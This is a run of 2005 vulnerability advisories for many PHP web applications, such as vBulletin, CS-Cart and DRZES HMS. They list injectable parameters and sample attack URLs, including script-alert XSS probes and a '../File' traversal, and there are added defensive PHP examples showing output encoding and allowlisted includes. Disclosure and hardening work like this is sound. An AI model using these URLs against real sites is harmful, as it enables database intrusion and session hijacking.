SearchFeed Search Engine uses SearchFeed's XML feed to display search results. When JavaScript is used, you are limited to just a few results, don't have full control of source HTML, and depend on SearchFeed's servers to process results. By using XML SearchFeed just sends results, and your site does everything else. Average search takes about 1-2 seconds and each page loads in less than a second.

Vuln. description:
Input passed to the search parameters when performing a search isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised.

RevenuePilot Search Engine XSS vuln.

Vuln. discovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.wwwsearchsolutions.com/revenuepilot.php
affected version:v1.2.0 and prior

Product Description:
With this script you can be running your own pay per click site in just a few minutes. Best of all it's FREE! RevenuePilot Search Engine is one of the best ways to make use of RevenuePilot's pay per click search engine affiliate program. RevenuePilot Search Engine only takes a minute to configure: just enter your RevenuePilot affiliate ID and site title, upload your files and you are up and running.

Vuln. description:
Input passed to the search parameters when performing a search isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised.

Google API Search XSS vuln.

Vuln. discovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.wwwsearchsolutions.com/google.php
affected version:v1.3.1 and prior

Product Description:
With this script you can be up and running your own Google search engine in just seconds! The Google Search Script uses the Google web API, PHP, and nusoap to get results for your site. Just upload your files, enter your web site's title and Google Key, and you are up and running. The script displays search results 10 per page, supports Google's suggested spellings, lets you search just your site's Google listing, returns results in just your language, compresses HTML output, and is 100% template based.

Vuln. description:
Input passed to the "REQ" parameter in "index.php" when performing a search isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

example:
/index.php?REQ=%3Cscript%3Ealert('r0t%20XSS')%3C/script%3ESubmit=Submit

Solution:
Edit the source code to ensure that input is properly sanitised.

K-Search Multiple vuln.

Vuln. discovered by : r0t
Date: 28 nov. 2005
Vendor:http://turn-k.net/k-search
affected version:1.0 and prior

Product Description:

K-Search is a very fast and highly customizable meta-search engine. It queries Google, AltaVista, MSN, Inktomi, FAST, Teoma, LookSmart and dmoz simultaneously and uses an effective algorithm to determine the finest results. The script contains a built-in PPC (Pay Per Click) system that allows sponsors to place their paid results for specified keywords (payment integration with PayPal and 2CheckOut). Search results can be cached in the database to speed up popular searches. Search queries are logged to offer search suggestions. Advanced search. User search preferences. Multilanguage ready - can be translated through a language file.

Vuln. description:

1.
Input passed to the "term" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/index.php?term=%23%25%23term%23%25%23&sm=Mekl%E7t&source=1&req=search

/index.php?term=%28%27r0t+checker%27%29&sm=Mekl%E7t&source=1&req=search

2.
Input passed to many parameters in "index.php" (see the examples below) isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/index.php?req=edit&id=[SQL]
/index.php?req=view&act=stat_all&stat=[SQL]
/index.php?req=view&act=status&id=1&stat=[SQL]
/index.php?req=view&act=status&id=[SQL]
/index.php?req=delsite&id=[SQL]
/index.php?req=search&source=[SQL]

3.
In "/index.php?req=add", the image upload parameters aren't properly sanitised before being used in a SQL query. An attacker can obtain the full installation path.

Solution:
Edit the source code to ensure that input is properly sanitised.

edmoBBS SQL inj. vuln.

Vuln. discovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.upyournet.com/edmobbs/index.php
affected version: V0.9 and prior

Product Description:
edmoBBS is not a cluttered and complex board system with membership requirements. It is instead simple and modern. The goal of edmoBBS is to meet the needs of webmasters looking for an easy to manage and easy to use general purpose board which uses PHP and MySQL for efficiency and speed. Multiple boards can be created and managed with the powerful admin features. edmoBBS is available in two versions: a fully functional FREE version, and a more refined commercial version for $50.00.

Vuln. description:
Input passed to the "table" and "messageID" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/edmobbs9r.php?messageID=1&table=[SQL]
/edmobbs9r.php?messageID=1[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

JBB SQL inj. vuln.

Vuln. discovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.joelh.de/jbb/
affected version: jbb 0.9.9rc3 and prior

Vuln. description:
Input passed to the "nr" parameter in "topiczeigen.php", the "forum" and "zeigeseite" parameters in "showforum.php", the "forum" parameter in "newtopic.php" and the "tidnr" parameter in "neuerbeitrag.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/topiczeigen.php?nr=[SQL]
/showforum.php?forum=[SQL]
/showforum.php?forum=1&zeigeseite=[SQL]
/newtopic.php?forum=[SQL]
/neuerbeitrag.php?tidnr=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Ugroup 2.6.2 SQL inj. vuln.

Vuln. discovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.realsoftstudio.com/Ugroup/
affected version:2.6.2 and prior


Product Description:

A software discussion platform written in PHP & MySQL.
Ugroup is a Discussion Board application developed in PHP and uses MySQL as a database server. With Ugroup, users will be able to post questions, comments and ideas to different discussion groups on your web site. An Administrator will be able to create the custom discussion group and assign users. Among some of the new features in this edition: includes the ability to approve or disqualify a message; create your own private discussion area, where only the selected users will be able to post/view the messages; read only discussion, where you and the selected users will be able to post articles and messages, but all would be able to only read.


Vuln. description:

Input passed to the "FORUM_ID" parameter in "forum.php" and the "CAT_ID", "FORUM_ID" and "TOPIC_ID" parameters in "topic.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/forum.php?FORUM_ID=[SQL]
/topic.php?CAT_ID=1&FORUM_ID=1&TOPIC_ID=[SQL]
/topic.php?CAT_ID=1&FORUM_ID=[SQL]
/topic.php?CAT_ID=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

ShockBoard SQL inj. vuln.

Vuln. discovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.sourceshock.com/
affected version:v3.0 and v4.0 [develop. version]

Product Description:
An easy to set up and use message board written in PHP with MySQL on the backend. Features: avatars; smilies; advanced profiles; moderators, supermoderators and administrators; database cleanup function; standard things like quotes and deleting messages; private forums; and more.

Vuln. description:
Input passed to the "offset" parameter in "topic.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/topic.php?offset=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Netzbrett 1.5.1 SQL inj. vuln.

Vuln. discovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.weaverslave.ws/index.32.html
affected version: 1.5.1 and prior

Product Description:

Netzbrett is a Web board / forum system written in PHP3/4 that can use flat text files, MySQL or the PHP 4 db object (Interbase, MSQL, MSSQL, MySQL, Oracle 8, ODBC, PostgreSQL, Storage, Sybase) for data handling. The forum includes a simple Admin mode, which enables modifying and deletion of entries by the admin. It also includes a print view. The program is available in English, German, Italian, Chinese (Taiwan) and many other languages. You can show the dates as C.A., B.E or Thai.

Vuln. description:

Input passed to the "p_entry" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/index.php?p_lng=en&p_days=15&p_cmd=entry&p_entry=1[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

SimpleBBS v1.1 SQL inj. vuln.

Vuln. discovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.simplemedia.org/
affected version: v1.1 and prior

Product Description:

SimpleBBS is a free flat-file based bulletin board. It is very easy to install and use, and there are no useless features, so even first timers can learn to use it fast.

Vuln. description:

Input passed to the search module parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


Solution:
Edit the source code to ensure that input is properly sanitised.

Sunday, November 27, 2005

ADC2000 NG Pro SQL inj. vuln.

Vuln. discovered by : r0t
Date: 27 nov. 2005
Vendor:http://www.td-systems.com/products/
affected version: 1.2 and ADC2000 NG Pro Lite

Product Description:
AD Center 2000 NG Pro is a professional version of banner exchange software for organizing your own Banner Exchange. The software uses a MySQL backend, and has rich media ads support, multibanner support, advanced targeting, multilanguage support, flash stats and much more. A C engine with an internal cache system allows you to handle huge loads and show up to 6 million banners per day.

Vuln. description:
Input passed to the "lang" and "cat" parameters in "adcbrowres.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/adcbrowres.php?lang=english&cat=[SQL]
/adcbrowres.php?lang=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

PHP Doc System 1.5.1 Local file inclusion vuln.

Vuln. discovered by : r0t
Date: 27 nov. 2005
Vendor:http://www.alexking.org/
affected version: 1.5.1 and prior

Product Description:
A modular PHP system for creating documentation. You create modules for documentation elements (installation steps, buttons, screens, etc.) and then refer to them instead of having to copy/paste information you'd want to have in 2 or more places. For example, you have an application that has buttons on a toolbar which appears on several screens. You define each button, define the toolbar and include the buttons, then define the screens and include the toolbar which in turn includes the buttons. It can run as dynamic PHP, including everything on the fly or it can output static HTML that you can include in your software distribution. Version 1.5 adds a 'related links' sidebar and a module generator. Offered as Donationware.

Vuln. description:
Input passed to the "show" parameter in "index.php" isn't properly verified before it is used to include files. This can be exploited to include or view arbitrary files from local resources.

example:
/index.php?show=../File

Solution:
Edit the source code to ensure that input is properly sanitised.

SDMS 2.0 SQL inj. vuln.

Simple Document Management System SQL injection Vuln.

Vuln. discovered by : r0t
Date: 27 nov. 2005
Vendor:http://sdms.cafuego.net/
affected version: 2.0-CVS and prior

Product Description:
SDMS uses PHP to provide you with a pretty interface to a MySQL server that allows you to store and retrieve documents and to share those documents between users. In addition, the system uses ACLs (Access Control Lists) to grant access rights to documents on a per-user basis. It allows you to distribute project documentation on a need-to-know basis, whilst keeping a central repository of documents that is accessible to all team members and easy to manage.



Vuln. description:
Input passed to the "folder_id" parameter in "list.php" and the "mid" parameter in "messages.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/list.php?folder_id=[SQL]
/messages.php?forum=1&action=view&mid=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Saturday, November 26, 2005

VBulletin 3.5.1 XSS vuln.

Vuln. discovered by : r0t
Date: 26 nov. 2005
Vendor:http://www.vbulletin.com/
affected version:3.5.1 and prior

Vuln. Description:

vBulletin contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the remote avatar URL upon submission to the profile.php script. This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Manual Testing Notes:
Specify the following in the remote avatar URL field on the editavatar page:
http://www.parsing:error[XSS].com/.jpg


Solution:
Edit the source code to ensure that input is properly sanitised.

Disclosure timeline:

15 nov. contacted vendor.
To date there is no fix from the vendor.

Zorum Forum 3.5 "rollid" SQL inj. vuln.

Vuln. discovered by : r0t
Date: 26 nov. 2005
Vendor:http://zorum.phpoutsourcing.com/index.php
affected version: 3.5 and prior


Vuln. Description:

Input passed to the "rollid" parameter is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Example:
/index.php?method=showhtmllist&list=topic&rollid=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

Amazon Shop 5.0.0 XSS vuln.

Vuln. discovered by : r0t
Date: 26 nov. 2005
Vendor:http://www.ghostscripter.com/amazon_shop.php
affected version:5.0.0 and prior

Product description:

With Amazon Shop you can run your very own fully functional shop without dealing with stock, payments etc... just set up an Amazon Associate account, install the 'Amazon Shop' script using the easy installation file and you're ready to go! You can easily edit which categories and items are displayed on your site. You can offer any of the items that Amazon does and earn up to 15% in referral fees. The built-in shopping cart allows customers to add their product to the cart and leave your website only when ready to checkout at Amazon.com. All pages are easily modified via the built in WYSIWYG editor (i.e. 6+). Have multiple templates installed, instantly changeable through the admin panel. Optional Dynamic Title, Sort Box, Meta Keywords and Path bar. Custom Categories & Products. Automatic DB fill for Hot Deals & Featured Items. Supports US, UK, DE, JP, FR and CA. All languages in language files for easy change. Powerful Admin Panel. Optional mod_rewrite for search engine friendly URLs.

Vuln. Description:

Input passed to the "query" parameter in "search.php" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

example:
/search.php?query=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&mode=all&imageField.x=21&imageField.y=4


Solution:
Edit the source code to ensure that input is properly sanitised.

Post Affiliate Pro 2.0.x Vuln.

Vuln. discovered by : r0t
Date: 26 nov. 2005
Vendor:http://www.qualityunit.com/postaffiliatepro/
affected version:2.0.4 and prior



Product description:

Very powerful affiliate software. Free installation with every purchase. Easily set up and maintain your own affiliate program. Support for all types of commissions up to 10 tiers, including recurring. Customizable email notifications, mass emails to affiliates. Flexible payout functions, set minimum balance, full payout history. Approve affiliates and sales. Automatic fraud protection. Performance rewards, signup bonus. Multi-language support. Extensive reports and statistics, and much more.




Vuln. Description:

1.
Input passed to the "sortorder" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


2.
Input passed to the "md" parameter in "index.php" isn't properly verified before it is used to include files. This can be exploited to include arbitrary files from local resources.
Successful exploitation requires that "magic_quotes_gpc" is disabled.



examples:

/merchants/index.php?md=[FILE]

/postaffiliatepro/merchants/index.php?tm_userid=_&tm_orderid=&tm_transtype%5B%5D=32&tm_transtype%5B%5D=1&tm_transtype%5B%5D=2&tm_transtype%5B%5D=4&tm_transtype%5B%5D=8&tm_transtype%5B%5D=16&tm_transtype%5B%5D=64&tm_status=_&tm_day1=25&tm_month1=11&tm_year1=2005&tm_day2=25&tm_month2=11&tm_year2=2005&numrows=20&filtered=1&md=[File]

/merchants/index.php?um_name=&um_surname=&um_aid=&um_status=_&numrows=20&filtered=1&md=[File]

/merchants/index.php?tm_userid=_&tm_orderid=&tm_transtype%5B%5D=32&tm_transtype%5B%5D=1&tm_transtype%5B%5D=2&tm_transtype%5B%5D=4&tm_transtype%5B%5D=8&tm_transtype%5B%5D=16&tm_transtype%5B%5D=64&tm_status=_&tm_day1=25&tm_month1=11&tm_year1=2005&tm_day2=25&tm_month2=11&tm_year2=2005&numrows=20&filtered=1&md=Affiliate_Merchants_Views_TransactionManager&type=all&list_page=0&action=&sortby=ip&sortorder=[SQL]

/merchants/index.php?um_name=&um_surname=&um_aid=&um_status=_&numrows=20&filtered=1&md=Affiliate_Merchants_Views_AffiliateManager&list_page=0&sortby=a.surname&action=&sortorder=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.
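The "show" parameter in PHP Doc System and the "md" parameter above both pick the file that gets included. As an added example (not code from either product), this is how a defender would resolve such a parameter: a strict name pattern, then a realpath() prefix check, tried against constructed inputs including the "../File" form from the PHP Doc System advisory. The modules directory, the module file and the function names are made up for the demo.

```php
<?php
// Added example: allowlisted module resolution for an include-selecting
// request parameter. Not code from PHP Doc System or Post Affiliate Pro;
// directory, module and function names are constructed for this demo.

declare(strict_types=1);

// Vulnerable pattern: the request value is spliced straight into the include path.
function vulnerableModulePath(string $baseDir, string $md): string
{
    return $baseDir . '/' . $md . '.php';   // "../File" walks out of $baseDir
}

// Hardened: the name must match a strict pattern and the resolved path must
// stay inside the modules directory. The pattern leaves no room for "/", "."
// or a NUL byte (the byte that magic_quotes_gpc happened to escape, which is
// why the advisory notes the setting must be off for exploitation).
function resolveModulePath(string $baseDir, string $md): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $md)) {
        return null;
    }
    $base = realpath($baseDir);
    $full = realpath($baseDir . '/' . $md . '.php');
    if ($base === false || $full === false) {
        return null;                        // unknown module or missing directory
    }
    // realpath() has canonicalised symlinks and ".." before this prefix comparison.
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

// Demo: build a throwaway modules directory and try constructed inputs.
$tmp = sys_get_temp_dir() . '/modules_demo_' . getmypid();
mkdir($tmp);
$module = 'Affiliate_Merchants_Views_AffiliateManager';   // module name taken from the advisory URLs
file_put_contents("$tmp/$module.php", "<?php echo 'affiliate manager';\n");

$inputs = [
    $module,          // legitimate module name
    '../File',        // traversal form from the PHP Doc System advisory
    "$module\0",      // trailing NUL byte
    'No_Such_Module', // well-formed name, but no such file
];
foreach ($inputs as $md) {
    $path = resolveModulePath($tmp, $md);
    printf("%-48s => %s\n", addcslashes($md, "\0"), $path === null ? 'rejected' : 'ok');
}

// Only a resolved path ever reaches include.
$path = resolveModulePath($tmp, $module);
if ($path !== null) {
    include $path;
    echo "\n";
}
unlink("$tmp/$module.php");
rmdir($tmp);
```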

BosDates v4.0 SQL vuln

Vuln. discovered by : r0t
Date: 26 nov. 2005
Vendor:http://www.bosdev.com/bosdates/
affected version: BosDates v4.0 and prior


Product description:

The BosDates event calendar is a flexible calendar system which allows for multiple calendars, email notifications, repeating events and much more. All of which are easily maintained by even the least technical users.
The BosDates event calendar system allows your visitors to interact with your site on a whole new level. And we all know that interactive websites keep their visitors coming back on a regular basis.
With BosDates you can Create unlimited calendars easily, Assign calendars to non technical users, Inform target audiences of events that interest them and Publish your events world wide
The BosDates calendar system is the best full featured calendar system on the market today at half the price of our competitors!

Vuln. Description:

Input passed to the "year" and "category" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


example:
/calendar.php?type=day&calendar=&category=&day=25&month=11&year=[SQL]
/calendar.php?type=day&calendar=&category=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Entergal MX V2.0 SQL vuln.

Vuln. discovered by : r0t
Date: 26 nov. 2005
Vendor:www.entergal.com
affected version: v2.0 and prior

Product description:
Entergal Directory MX for PHP is the ultimate solution for making money from your own directory engine. This package gives you total flexibility over the type of directory you want to run - from a Google type directory to business yellow pages to computer games topsites. Our system uses regular resets along with the World's only rolling fortnight system which guarantees the most reliable results possible! There are also many built in cheat protection features and a fully featured admin panel.

Vuln. Description:
Input passed to the "action" and "idcat" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


example:
/?action=showcat&idcat=[SQL]
/?action=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

Friday, November 25, 2005

CS-Cart SQL inj. vuln.

Vuln. discovered by : r0t
Date: 25 nov. 2005
Vendor:www.cs-cart.com
affected version: Latest.


Product description:
CS-Cart is a turnkey solution that includes all of the necessary features and functions to successfully build an online product store/catalog. It is ready to use "out of the box". With its easy to use functionality you can immediately start to build and operate an ecommerce website of any complexity: from a simple offline product catalog to fully-featured interactive online store. Optimized programming code makes it possible to build catalogs that can easily handle over 10,000 product and informational pages. And integrated HTML catalog tool allows generating a search-engine friendly version of your website.


Vuln. Description:

Input passed to the "sort_by" and "sort_order" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/index.php?target=products&mode=search&subcats=Y&type=extended&avail=Y&pshor=Y&pfull=Y&pname=Y&cid=0&q=&x=11&y=3&sort_by=[SQL]

/index.php?target=products&mode=search&subcats=Y&type=extended&avail=Y&pshor=Y&pfull=Y&pname=Y&cid=0&q=%27&x=11&y=3&sort_by=product&sort_order=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

DRZES HMS 3.2 Multiple vuln.

DRZES HMS 3.2 - Hosting Management System -multiple SQL inj. vuln. and XSS vuln.

Vuln. discovered by : r0t
Date: 25 nov. 2005
Vendor:http://drzes.com/
affected version:3.2 and prior


Product description:

Increase your efficiency using the DRZES HMS. The DRZES HMS is packed with features perfect for the professional web hosting company. The HMS is an all-in-one solution featuring a robust control panel, the ability to manage all of your servers from one centralized location, allows your customers to manage all of their plans from one centralized location, fully customizable front-end, and customer control area including the control panel and much more. We do not brand our name on your site. More features include multiple billing gateways supported, multiple registrar API's supported, server monitoring, robust plan maintenance functions, bandwidth monitoring and more. If there's a specific feature you need before you purchase the drzes HMS or an additional API supported please let us know and we will promptly take care of your request.

Vuln. Description:

1. Multiple SQL injection vuln.
Input passed to the "plan_id" and "domain" parameters in "pop_accounts.php", "databases.php", "ftp_users.php", "crons.php", "pass_dirs.php", "zone_files.php", "htaccess.php", "software.php", "domains.php" and "viewusage.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "invoiceID" parameter in "viewinvoice.php", the "customerPlanID" parameter in "viewplan.php" and "listcharges.php", and the "ref_id" parameter in "referred_plans.php" likewise isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/customers/domains.php?plan_id=[SQL]
/customers/viewinvoice.php?invoiceID=[SQL]
/customers/viewplan.php?customerPlanID=[SQL]
/customers/referred_plans.php?ref_id=[SQL]
/customers/referred_plans.php?sort=id&order=asc&ref_id=[SQL]
/customers/viewusage.php?plan_id=[SQL]
/customers/listcharges.php?customerPlanID=[SQL]
/customers/pop_accounts.php?plan_id=[SQL]
/customers/pop_accounts.php?plan_id=35&domain=[SQL]
/customers/databases.php?plan_id=[SQL]
/customers/databases.php?plan_id=35&domain=[SQL]
/customers/ftp_users.php?plan_id=[SQL]
/customers/ftp_users.php?plan_id=35&domain=[SQL]
/customers/crons.php?plan_id=[SQL]
/customers/crons.php?plan_id=35&domain=[SQL]
/customers/pass_dirs.php?plan_id=[SQL]
/customers/pass_dirs.php?plan_id=35&domain=[SQL]
/customers/zone_files.php?plan_id=[SQL]
/customers/zone_files.php?plan_id=35&domain=[SQL]
/customers/htaccess.php?plan_id=[SQL]
/customers/htaccess.php?plan_id=35&domain=[SQL]
/customers/software.php?plan_id=[SQL]
/customers/software.php?plan_id=35&domain=[SQL]


2. XSS vuln. in the domain availability search field
in:
/customers/register_domain.php
The domain availability search parameters aren't properly sanitised before being returned to the user when performing a search. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised.
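The reflected search XSS advisories above (SearchFeed, RevenuePilot, Google API Search, Amazon Shop and the DRZES domain search) share one fix, encoding at output time, and the vBulletin avatar URL case adds a second: validate a URL before it is written into an attribute. Added example, not code from any of those products; the helper names, the default avatar path and the accepted image extensions are assumptions.

```php
<?php
// Added example: output encoding for a reflected search term, plus validation
// of a user-supplied remote avatar URL before it lands in an <img src>
// attribute. Not code from any product on this page; names are hypothetical.

declare(strict_types=1);

// Vulnerable pattern: the raw query string is interpolated into HTML.
function vulnerableResultsHeader(string $query): string
{
    return "<h2>Results for: $query</h2>";
}

// Hardened: encode for the HTML context at the point of output. ENT_QUOTES
// covers both quote characters, so the same helper is safe inside attributes.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function safeResultsHeader(string $query): string
{
    return "<h2>Results for: " . h($query) . "</h2>";
}

// Remote avatar URL: accept only an absolute http(s) URL with a syntactically
// valid hostname, no embedded credentials and an image extension. Anything
// else falls back to a site default instead of being echoed.
function validateAvatarUrl(string $url): ?string
{
    if (strlen($url) > 255 || filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $parts = parse_url($url);
    if (!is_array($parts)) {
        return null;
    }
    if (!in_array($parts['scheme'] ?? '', ['http', 'https'], true)) {
        return null;
    }
    // FILTER_VALIDATE_URL is lax about host syntax; require a real hostname.
    if (filter_var($parts['host'] ?? '', FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) === false) {
        return null;
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;
    }
    if (!preg_match('/\.(gif|jpe?g|png)$/i', $parts['path'] ?? '')) {
        return null;
    }
    return $url;
}

function avatarImgTag(string $url): string
{
    $ok = validateAvatarUrl($url);
    if ($ok === null) {
        return '<img src="/images/default_avatar.png" alt="avatar">';   // assumed default path
    }
    return '<img src="' . h($ok) . '" alt="avatar">';
}

// Demo with constructed inputs.
$probe = "<script>alert('r0t')</script>";
echo vulnerableResultsHeader($probe), "\n";   // the tag reaches the page as markup
echo safeResultsHeader($probe), "\n";         // rendered as literal text
echo avatarImgTag('http://www.parsing:error[XSS].com/.jpg'), "\n";   // the vBulletin probe: rejected
echo avatarImgTag('https://example.com/avatars/me.png'), "\n";       // well-formed: accepted and encoded
```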

Clientexec 2.x Multiple SQL inj.

Vuln. discovered by : r0t
Date: 25 nov. 2005
Vendor:http://www.clientexec.com/
affected version: Tested on 2.3, but newer versions may also be affected.

Product description:
ClientExec is a tool to help web hosts manage and support their clients efficiently. Unlike many client management packages, ClientExec does not try to be all things to all people; you are in control. We want it to be a natural addition to your business, a powerful tool you use, not get lost within. Top features include powerful customer management, recurring invoicing, an integrated helpdesk and tons of 3rd party payment processor support. Auto-withdrawal for authorize.net and cdgcommerce accounts is now integrated into CE.

Vuln. Description:
Input passed to the "billshowid", "billdetailid", "fuse" and "frmClientID" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
clientexec/index.php?action=0&billdetailid=26&billshowid=[SQL]
clientexec/index.php?action=0&billdetailid=[SQL]
clientexec/index.php?fuse=[SQL]
clientexec/index.php?billshowid=[SQL]
clientexec/index.php?fuse=3&frmClientID=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

EZ Invoice Inc™ v 2.0 SQL inj.

Vuln. discovered by : r0t
Date: 25 nov. 2005
Vendor:http://www.ezinvoiceinc.com/
affected version:v 2.0 and prior



Product description:
This software is the easiest way to create and manage invoices online with just the click of the mouse from anywhere in the world. All you need is a website with an internet connection. EZI was created for the small business person: mom and pop shops, sole proprietors, small graphic studios, online start ups, solopreneurs, virtual assistants and more. EZI features a client lounge where your clients can log in to view, print and even pay their invoices online by Credit Card (PayPal integration). Created by a Graphic Designer, the software looks simple and therefore is easy to use and learn!

Vuln. Description:
Input passed to the "i" parameter in "invoices.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/ezi/invoices.php?i=[SQL]

Solution:

EZ Invoice, Inc™ has a patch available. Please email support@ezinvoiceinc.com and EZI will email you the patch to fix this small issue.

LogicBill 1.0 SQL inj.

Vuln. discovered by : r0t
Date: 25 nov. 2005
Vendor:http://www.logicbill.com
affected version: 1.0 and prior

Product description:
LogicBill is a fully featured web based billing application. It offers integrations with several payment processors, automated invoice generation, reporting, client administration features and a clean but powerful interface for your staff and customers.

Vuln. Description:
Input passed to the "__mode" and "__id" parameters in "helpdesk.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/helpdesk.php?__mode=[SQL]
/helpdesk.php?__mode=view&__id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Fantastic News "category" SQL inj.

Vuln. discovered by : r0t
Date: 25 nov. 2005
Vendor:www.fscripts.com
Product link:http://fscripts.com/free.php?id=1
affected version: 2.1.1 and prior


Product description:

Fantastic News is a very simple but powerful news management system. It comes with an easy install script and, since it uses templates, gives you the ability to modify everything that the script displays. It has multiple user levels for news posters, the ability to comment on news, rating of news items, a read-more option, a WYSIWYG editor for news, uploading of files to news items, smilies and comment code for comments. It can generate XML feeds for a specified number of news items. It has archive and search support as well as a built-in news tip system. It contains all these features but is also very fast and uses minimal resources.


Vuln. Description:

Input passed to the "category" parameter in "news.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/news.php?action=news&category=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

DMANews Multiple SQL inj. vuln.

Vuln. discovered by: r0t
Date: 25 nov. 2005
Vendor:http://www.dmanews.com/
affected version: 0.904 (latest downloadable version) and v0.910 [development version]

Product description:

Popular, powerful, secure. DMANews focuses on ease of use and flexible customisation. With excellent documentation and a choice of 4 beautiful control panels, it installs in 5 minutes flat with an easy interactive walkthrough script. Save yourself some time and check out the (always working!) online demo for an immediate appraisal. Requires PHP4 & MySQL.

Vuln. Description:

Input passed to multiple parameters isn't properly sanitised before being used in SQL queries (see the examples below). This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:

/index.php?action=comments&id=[SQL]
/index.php?action=news_list&navigation=1&sortorder=unixtime&sortdirection=DESC&start_item=4&display_num=[SQL]
/index.php?action=news_list&navigation=1&sortorder=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

phpWordPress 3.0 SQL inj.

phpWordPress Article Manager 3.0 SQL inj.

Vuln. discovered by: r0t
Date: 25 nov. 2005
Vendor:http://www.word-press.net/
affected version: 3.0 and prior.

Vuln. Description:
Input passed to the "poll", "category" and "archive" parameters in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/index.php?poll=[SQL]
/index.php?category=[SQL]
/?archive&ctg=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

sNews 1.3 SQL injection.

Vuln. discovered by: r0t
Date: 25 nov. 2005
Vendor:http://www.solucija.com/
affected version: 1.3 and prior

Vuln. Description:
Input passed to the "id" and "category" parameters in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


Solution:
Edit the source code to ensure that input is properly sanitised.

Kayako SupportSuite v3.00.x Full path Disclosure

Vuln. discovered by: r0t
Date: 25 nov. 2005
Vendor:kayako.com
affected version: v3.00.12 and prior

Vuln. Description:

Requesting the pages below with invalid or missing parameter values makes the application emit error messages that contain its installation path, which an attacker can use to plan further attacks.
Examples:

/index.php?_m=troubleshooter&_a=
